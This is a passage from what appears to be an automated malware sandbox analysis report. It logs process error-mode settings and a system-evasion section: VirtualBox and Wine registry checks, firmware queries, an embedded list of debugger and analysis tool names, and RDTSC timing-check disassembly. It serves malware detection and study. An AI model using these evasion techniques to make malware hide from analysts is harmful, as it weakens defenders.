                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_6-37632
                          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12061
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9825
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD044
                          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD044
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXEA
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000002.2383484429.00000000008FC000.00000004.00000001.01000000.0000000E.sdmp, 80f68847d3.exe, 00000023.00000002.2385449886.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                          Source: skotes.exe, 00000006.00000002.2681819982.000000000145B000.00000004.00000020.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000002.2383484429.00000000008FC000.00000004.00000001.01000000.0000000E.sdmp, 80f68847d3.exe, 00000023.00000002.2385449886.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU!
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDANR.EXE
                          Source: svchost.exe, 00000029.00000002.2372420603.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79062 second address: A79078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77FE1 second address: A77FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F6B312295E6h 0x0000000a jno 00007F6B312295E6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7816D second address: A78194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F6B30D7C396h 0x0000000e jmp 00007F6B30D7C3A9h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78194 second address: A7819E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7819E second address: A781C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6B30D7C396h 0x0000000a jmp 00007F6B30D7C3A9h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A781C1 second address: A781C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7831C second address: A78331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6B30D7C3A0h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A788D3 second address: A788ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B199 second address: A7B1BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jnl 00007F6B30D7C396h 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jg 00007F6B30D7C396h 0x00000023 pop ecx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B1BD second address: A7B1E7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B312295E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jc 00007F6B312295F2h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B269 second address: A7B317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F6B30D7C398h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F6B30D7C3A0h 0x00000028 mov ecx, dword ptr [ebp+122D2E80h] 0x0000002e mov edx, dword ptr [ebp+122D3D26h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 mov edx, 61A13000h 0x0000003c pop edx 0x0000003d call 00007F6B30D7C399h 0x00000042 jg 00007F6B30D7C39Eh 0x00000048 push eax 0x00000049 jne 00007F6B30D7C39Eh 0x0000004f mov eax, dword ptr [esp+04h] 0x00000053 jp 00007F6B30D7C3A4h 0x00000059 mov eax, dword ptr [eax] 0x0000005b jns 00007F6B30D7C3A2h 0x00000061 mov dword ptr [esp+04h], eax 0x00000065 push eax 0x00000066 push edx 0x00000067 je 00007F6B30D7C398h 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B317 second address: A7B3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B312295F3h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e and edx, dword ptr [ebp+122D2FC8h] 0x00000014 push 00000003h 0x00000016 or edx, dword ptr [ebp+122D30C0h] 0x0000001c push 00000000h 0x0000001e jmp 00007F6B312295F0h 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F6B312295E8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007F6B312295ECh 0x00000044 call 00007F6B312295E9h 0x00000049 jmp 00007F6B312295EEh 0x0000004e push eax 0x0000004f jmp 00007F6B312295EBh 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 push ecx 0x00000059 push esi 0x0000005a push eax 0x0000005b pop eax 0x0000005c pop esi 0x0000005d pop ecx 0x0000005e mov eax, dword ptr [eax] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jnc 00007F6B312295E6h 0x0000006a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B3BD second address: A7B3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B3C1 second address: A7B3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B503 second address: A7B51B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B51B second address: A7B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B606 second address: A7B60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B395 second address: A9B399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B6B1 second address: A9B6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B6B7 second address: A9B722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F6B312295F9h 0x00000010 pop eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F6B312295FBh 0x0000001a push edi 0x0000001b jmp 00007F6B312295F3h 0x00000020 pop edi 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9BCB0 second address: A9BCB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9BCB5 second address: A9BCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9BCBB second address: A9BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9BF68 second address: A9BF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9BF6C second address: A9BF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C0D9 second address: A9C0E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C24F second address: A9C267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnc 00007F6B30D7C396h 0x00000011 jbe 00007F6B30D7C396h 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9C267 second address: A9C276 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B312295EAh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72102 second address: A7210A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA17 second address: A9CA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA1D second address: A9CA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6B30D7C396h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6B30D7C396h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA32 second address: A9CA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9CA36 second address: A9CA41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
